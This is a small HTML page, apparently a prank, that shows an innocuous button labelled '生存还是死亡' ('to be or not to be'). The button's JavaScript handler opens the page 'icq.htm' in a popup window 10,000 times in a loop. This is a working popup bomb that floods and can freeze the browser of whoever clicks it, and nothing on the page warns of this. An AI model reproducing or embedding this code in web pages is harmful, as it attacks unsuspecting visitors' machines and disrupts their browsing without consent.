<html> <head> <title>Untitled Document</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <script language="JavaScript">
<!---hide---
function pop(){
for(i=1;i<=10000;i++){
window.open('icq.htm','','width=400,height=460','status=off','location=off','toolbar=off',' scrollbars=off')}}
//---> </script>
</head>
<body bgcolor="#FFFFFF" text="#000000"> <form name="form"> <p> <input type="button" value="生存还是死亡" onClick="pop()" name="button" class="unnamed1"> </p> </form>
</body> </html>
|